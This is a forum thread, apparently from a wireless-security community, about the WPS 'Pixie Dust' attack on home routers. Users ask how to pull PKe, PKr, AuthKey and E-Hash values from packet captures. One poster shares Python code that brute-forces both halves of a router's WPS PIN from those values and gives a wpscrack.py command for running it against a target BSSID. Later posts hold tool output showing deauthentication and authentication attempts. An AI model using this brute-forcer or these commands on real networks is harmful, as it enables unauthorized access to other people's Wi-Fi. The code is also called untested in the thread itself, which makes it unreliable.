code removed
Printable View
code removed
code removed
hey can anyone share the method of extracting
PKe
- PKr
- AuthKey
- E-Hash1
- E-Hash2
from cap files?
@ dathead
i dindn't learnt C or cryptologie (or maths) this week-end so I don't really get the details... (at all)
If i undesrtand well vendors uses may have used this "random function" :
http://opencores.org/ocsvn/openrisc/...t/src/rand.cxx
thank you for sharing your code , great job :)
Hi Guys,
I have coded the Pixie Dust Attack just when ES1=ES2=0 for Ralink devices. I have used the C code as test vector for the input data.
You can find it here : https://bitbucket.org/dudux/wpsoffline/
I am running out of time, but I would like to implement the bruteforce for the PRNG state for Broadcoms. After all, I would like to translate it to C into Reaver or bully. But surely someone is better C programmer and got more time than me.Code:import hashlib, hmac
PK_E = "11e11709c0836c10e5a93a415f7869c5351f7218ab68867c3a1f8dbb9b8f984c"\
"e0eabcbfd212fdc04fd9b3675e9dd9578d53ed5904177bdbe4fe64008a4a47de"\
"50e7fc6409dc750b295565f54f1fe78582d78de0fac72675677cb1c85c5ca46a"\
"5fced284ad79a27b4c38038b207ee76d3d556d7c3606310e52f5c6123a1f4997"\
"6566cc21c31d40e5412decb2712d07667ac0803b21ca1df15f8f25814dc313cf"\
"7bcdffeac436b5f2d40ceb18df5d90ac1e545eddd43ec7e78d4970d313a65746".decode("hex")
PK_R = "531ff143e7ef3663de555704904fbe5417a2b465f175cf55e01ab94cff9156d3"\
"b6c272d1315fa70c4719897cea28f984ba0eccf22e86f48d4f8a275fcc78e37a"\
"b81e917a376e038595ab980d57898224aed228052f29efa6299f11cd4d7aa562"\
"b7baf1404ae8a15b70c130718cb1e0db6a32af3be2eb073927ef414ea2fd5ced"\
"6595a95c5e28fa3badf69ddb15f9f74deb1690139122eab14f99adc9d360f7d4"\
"f066fab35b77a46eb7286172eae8dd7eda768849307f9b00f06d69571b9da243".decode("hex")
eHash1 = "c14b83a3415999bba082f467872fd4bc9b79778b33d1d20cab55cb7d0b96cf43".decode("hex")
eHash2 = "3516ace7cd46bcbcac83b3065be66a89186a54da8800d336041e8ab847929416".decode("hex")
AuthKey = "d5c7e4a9fb5911b31dcbf80db712b34ed71a9218c9c111992c60d883e197e9ea".decode("hex")
# if ES1,ES2 are found out, recover the halves of PIN
second_half = first_half = 0
es1 = es2 = '\00' * 16 # (str(es2).zfill(32)).decode('hex')
for first_half in xrange(10000):
PSK1_guess = hmac.new(AuthKey, (str(first_half)).zfill(4), hashlib.sha256).digest()[:16]
eHash1_guess = hmac.new(AuthKey, es1 + PSK1_guess + PK_E + PK_R, hashlib.sha256).digest()
if (eHash1 == eHash1_guess): #First half done
for second_half in xrange(10000):
PSK2_guess = hmac.new(AuthKey, (str(second_half)).zfill(4), hashlib.sha256).digest()[:16]
eHash2_guess = hmac.new(AuthKey, es2 + PSK2_guess + PK_E + PK_R, hashlib.sha256).digest()
if (eHash2 == eHash2_guess):
print "PIN FOUND! %04d%04d" %(first_half,second_half)
# doWPSprotocolWithPINguessed() #TODO
exit()
Proost!
I forgot to say that: "I blindly implemented the attack in the proof-of-concept of "wpscrack.py". It is only useful for Ralink's devices as TPLINKS routers.
I have not tested the attack in live! This code does the right offline bruteforcing. However, IT HAS NOT BEEN TESTED YET! Feel free to tweak it as you wish or do commit requests.
Usage:
Quote:
wpscrack_mod:$ sudo python wpscrack.py -i mon0 -b [BSSID] -s [ESSID] --offline -vv
Updated with a database in the original post :D
dudux, It say all the time "PIN FOUND! 57334196" for every routers.
Still Attack not available for BroadCom :confused: ..
You need to edit the file and put your own data. I dont know where PKR,PKE data is in the packets, thats where im stuck.
Tryed the tool and is giving me
But im trying against Broadcom and not Ralink, as said above Broadcom is not implemented yet.Code:Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
I hope guys keep developing this subject, its very interesting but over my personal understanding to put in practice, so ill have to wait.
Would it be feasible to add a import from cap feature? i guess that would put some testers running. Thanks everyone